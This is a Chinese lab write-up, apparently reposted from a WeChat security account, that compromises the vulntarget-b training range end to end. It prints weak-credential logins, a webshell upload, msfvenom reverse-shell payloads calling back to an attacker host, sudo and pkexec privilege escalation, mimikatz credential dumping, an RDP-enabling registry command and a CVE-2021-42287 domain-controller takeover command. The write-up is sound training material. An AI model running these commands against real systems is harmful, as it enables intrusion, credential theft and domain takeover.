Loading [MathJax]/jax/output/CommonHTML/config.js
前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >Vulntarget-b靶场

Vulntarget-b靶场

作者头像
鸿鹄实验室
发布于 2022-11-02 08:57:57
发布于 2022-11-02 08:57:57
1.1K00
代码可运行
举报
文章被收录于专栏:鸿鹄实验室鸿鹄实验室
运行总次数:0
代码可运行

靶场地址:https://github.com/shengshengli/vulntarget

靶场拓展图

首先nmap进行端口扫描

nmap -sV -sS -sC 192.168.31.104

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     Pure-FTPd
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=125.122.127.185/organizationName=BT-PANEL/stateOrProvinceName=Guangdong/countryName=CN
| Not valid before: 2021-12-20T06:49:15
|_Not valid after:  2031-09-19T06:49:15
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 1b:0b:f2:25:18:99:fd:4d:c9:85:cf:e6:98:00:b9:05 (RSA)
|   256 7d:f8:b8:a2:81:d0:da:c1:26:34:ae:9d:9e:8f:36:a9 (ECDSA)
|_  256 78:b3:f9:a8:4b:33:2f:15:2d:bd:d1:25:3a:f8:d5:5f (ED25519)
80/tcp   open  http    nginx
|_http-title: \xE6\xB2\xA1\xE6\x9C\x89\xE6\x89\xBE\xE5\x88\xB0\xE7\xAB\x99\xE7\x82\xB9
81/tcp   open  http    nginx
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-title: \xE6\x9E\x81\xE8\x87\xB4CMS\xE5\xBB\xBA\xE7\xAB\x99\xE7\xB3\xBB\xE7\xBB\x9F
| http-robots.txt: 7 disallowed entries 
|_/A/ /Home/ /backup/ /cache/ /FrPHP/ /install/ /Conf/
888/tcp  open  http    nginx
|_http-title: 403 Forbidden
3306/tcp open  mysql   MySQL (unauthorized)
8888/tcp open  http    nginx
|_http-trane-info: Problem with XML parsing of /evox/about
|_http-favicon: OSS-Labs BT Panel
| http-robots.txt: 1 disallowed entry 
|_/
| http-title: \xE5\xAE\x89\xE5\x85\xA8\xE5\x85\xA5\xE5\x8F\xA3\xE6\xA0\xA1\xE9\xAA\x8C\xE5\xA4\xB1\xE8\xB4\xA5
|_Requested resource was http://192.168.31.104:8888/login
MAC Address: 4C:D5:77:CB:F4:99 (Chongqing Fugui Electronics)

21(ftp)不存在匿名登录 访问80端口,是一个宝塔

访问81端口,是一个极致CMS

访问8888端口,是宝塔后台的入口

从81端口找突破口, admin.php是极致CMS的后台地址,弱口令admin:admin123可以登录后台(也可以进行爆破)

进入后台,cms的版本为1.8.1,php版本为7.3.31 搜索发现可以通过添加插件(在线编辑模板)来getshell(参考:https://xz.aliyun.com/t/9359)

安装好插件,点击配置,配置一下用户和密码(不要忘记),然后再进入配置,点击提交会跳转到登录页面,使用自己设置好的用户和密码登录

登陆后就是网站的目录,并且权限还比较高,可以在php页面写一个shell

直接在index.php页面写入一句话,在index.php代码执行即可

在phpinfo页面发现disable_functions过滤了很多函数(比如能命令执行的system、passthru等) 可直接使用蚁剑插件来绕过disable_functions

只有www权限

使用ifconfig等查看网段是没回显的

msf生成一个反弹shell的elf文件,通过蚁剑上传到目标机器上

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.31.84 LPORT=1234 -f elf >shell.elf

msf进行监听端口-->运行elf文件-->上线msf,得到meterpreter

进入shell,发现有python,使用python获得一个交互shell

需要进行提权,先查看一些suid find / -user root -perm -4000 -print 2>/dev/null

有sudo可以用(CVE-2021-3156),还有一个pkexec(CVE-2021-4034),两个提权都可以

得到root权限 在/root目录下发现flag文件

在home目录下发现还有一个vulntarget用户

vulntarget:root弱口令可登录ssh

/www/wwwroot/jizhi/Conf/config.php文件发现连接数据库的用户名密码 admin:EcfMrPrtTJGL2GjL

ifconfig查看网络信息,还有一个10.0.20.30的网卡

上传fscan,来扫描10.0.20.30网段的存活主机,扫到一个10.0.20.66的主机,8080端口是禅道cms 还扫描到centos的ssh弱口令root:root

准备上线msf,生成elf文件,使用root用户执行,获得一个root权限的meterpreter

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.31.84 LPORT=5555 -f elf >shell.elf

将shell.elf上传到centos,msf进行监听,运行elf文件,成功上线msf

第一台centos已经拿下 使用msf来搭建代理,添加一个10.0.20网段的路由

使用msf6自带的socks模块:auxiliary/server/socks_proxy,这里使用socks5 设置好SRVHOST,SRVPORT

/etc/proxychains4.conf添加socks代理映射

proxychains4来进行操作 访问10.0.20.66的8080端口

访问index.php?mode=getconfig查看版本,版本为:12.4.2

搜索此版本的漏洞,可以文件上传 参考:https://blog.csdn.net/qq_36197704/article/details/109385695

admin:Admin123登录后台

在第一台机器(centos)开一个临时web服务,目录下写一个php一句话

HTTP://10.0.20.30:8081/shell.phpHTTP需大写

http://10.0.20.66:8080/index.php?m=client&f=download&version=1&link=SFRUUDovLzEwLjAuMjAuMzA6ODA4MS9zaGVsbC5waHA=

访问此地址,临时web服务器下的shell.php会被写入到data/client/1/目录下

蚁剑挂代理 进行连接,whoami查看一下权限,权限比较低

tasklist查看一下进行发现存在火绒

进行免杀,上线msf,权限是比较低的,需要进行提权

随手一试getsystem可以提权成功.....

进行抓取密码

load kiwi creds_all

抓到administrator和域成员的hash,进行hash解码

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
administrator:admin@123
win101:admin#123(域成员账号,需要登录一次否则抓不到)

C:\Users\administrator目录下发现flag

使用注册表来开启3389

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

ipconfig /all查看网络信息,win10的另一个网卡ip为10.0.10.99 win10在域环境中,域名为vulntarget.com 域控ip为:10.0.10.100

net group "domain controllers" /domain查看域控名:WIN-UH20PRD3EAO

使用scaninfo进行扫描,发现可以利用ms17010漏洞,发现利用ms17010会使域控蓝屏重启,放弃此漏洞

使用CVE-2021-42287

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
由于Active Directory没有对域中计算机与服务器账号进行验证,经过身份验证的攻击者利用该漏洞绕过完全限制,可将域中普通用户权限提升为域管理员权限并执行任意代码

使用域成员的用户和密码

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
python sam_the_admin.py vulntarget.com/win101:'admin#123' -dc-ip 10.0.10.100 -shell

获得域控的system权限

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2022-07-05,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 鸿鹄实验室 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
暂无评论
推荐阅读
编辑精选文章
换一批
vulntarget漏洞靶场系列(二)— vulntarget-b
星期五实验室的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息造成的直接或间接后果和损失,均由使用者本人负责。
乌鸦安全
2021/12/28
3.4K0
vulntarget漏洞靶场系列(二)— vulntarget-b
vulntarget-d
扫描一下存活主机与端口,发现开放了80、81、888、3306、8888端口,有宝塔的服务
MssnHarvey
2022/12/07
4490
vulntarget-d
Vulntarget-a靶场
靶场地址:https://github.com/shengshengli/vulntarget
鸿鹄实验室
2022/11/02
1.1K0
Vulntarget-a靶场
【永久开源】vulntarget-a 打靶记录
乌鸦安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。
乌鸦安全
2022/03/11
4.1K0
【永久开源】vulntarget-a 打靶记录
三层网络靶场搭建&MSF内网渗透
在最近的CTF比赛中,综合靶场出现的次数越来越多,这种形式的靶场和真实的内网渗透很像,很贴合实际工作,但我们往往缺少多层网络的练习环境。本文通过VMware搭建3层网络,并通过msf进行内网渗透,涉及代理搭建,流量转发,端口映射等常见内网渗透技术。
HACK学习
2019/08/06
3K0
三层网络靶场搭建&MSF内网渗透
C/C++ 将ShellCode注入进程内存
内存注入ShellCode的优势就在于被发现的概率极低,甚至可以被忽略,这是因为ShellCode被注入到进程内存中时,其并没有与之对应的硬盘文件,从而难以在磁盘中取证,但也存在一个弊端由于内存是易失性存储器,所以系统必须一直开机,不能关闭,该攻击手法可以应用于服务器上面,安全风险最小,注入后将注入器删除即可。
王 瑞
2022/12/28
7590
C/C++ 将ShellCode注入进程内存
python调用外部命令
os.popen4: 返回2个对象,pip_in 和pip_out_err(标准输出和标准错误输出保存到一个输出pip_out_err)
py3study
2020/01/06
1.3K0
【永久开源】vulntarget-c 打靶记录
乌鸦安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。
乌鸦安全
2022/03/11
1.5K0
【永久开源】vulntarget-c 打靶记录
各种转码(bytes、string、base64、numpy array、io、BufferedReader )
https://www.cnblogs.com/zhuminghui/p/11359858.html
全栈程序员站长
2022/09/14
7.3K0
【Mysql】innodb_space 的使用介绍
innodb_space 的git网址:https://github.com/jeremycole...
用户5522200
2019/06/02
2.4K0
vulntarget-f打靶记录
乌鸦安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。
乌鸦安全
2022/06/07
1.1K0
vulntarget-f打靶记录
从excel文件xlsx中特定单元格中提取图片「建议收藏」
第一种网上通用的用xlsx改zip压缩包,能批量提取出图片。但是无法知道图片在单元格中的顺序信息。
全栈程序员站长
2022/09/14
7K0
Web中间件常见安全漏洞总结
来源 | https://www.lxhsec.com/2019/03/04/middleware
Bypass
2020/02/26
17K0
让 HTTP 服务人类的Requests库
今天要谈的是requests库,这是一个功能强大的库,也是唯一的一个非转基因的 Python HTTP 库,人类可以安全享用。为什么这么说呢,还是因为它真的太强大了。它的创作者Kenneth Reitz大神,在github上有22.6K的粉丝。诺,你看!大家可以去围观一下,感受大神的气息!
啃饼思录
2018/09/17
7500
让 HTTP 服务人类的Requests库
记一次docker逃逸学习
这里直接使用漏扫工具检测struts2有无漏洞,这里发现存在S2-045、S2-046两个漏洞
红队蓝军
2022/05/17
9260
记一次docker逃逸学习
远程缓冲区溢出简单分析
重制版,新版教程,包含ROP反导绕过DEP技术: https://www.cnblogs.com/LyShark/p/12340479.html
王 瑞
2022/12/28
5460
远程缓冲区溢出简单分析
2021Kali — 木马免杀制作
发布者:全栈程序员栈长,转载请注明出处:https://javaforall.cn/171466.html原文链接:https://javaforall.cn
全栈程序员站长
2022/09/24
6720
2021Kali — 木马免杀制作
python 文件读写操作
以前的代码都是直接将数据输出到控制台,实际上我们也可以通过读/写文件的方式读取/输出到磁盘文件中,文件读写简称I/O操作。文件I/O操作一共分为四部分:打开(open)/读取(read)/写入(write)/关闭(close)……
猿说编程[Python和C]
2020/03/03
1.5K0
python 文件读写操作
vulntarget-e
这里外网win2016靶机有开防火墙,所以需要加个-d参数绕过防火墙进行端口扫描,但是这里扫的时候出了点问题,不过多试几次也能扫出来开放了5985端口(WinRM服务)和49773端口
MssnHarvey
2022/12/13
8660
vulntarget-e
24.python 文件读写操作
以前的代码都是直接将数据输出到控制台,实际上我们也可以通过读/写文件的方式读取/输出到磁盘文件中,文件读写简称I/O操作。文件I/O操作一共分为四部分:打开(open)/读取(read)/写入(write)/关闭(close)……
猿说编程[Python和C]
2020/03/12
5500
24.python 文件读写操作
相关推荐
vulntarget漏洞靶场系列(二)— vulntarget-b
更多 >
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档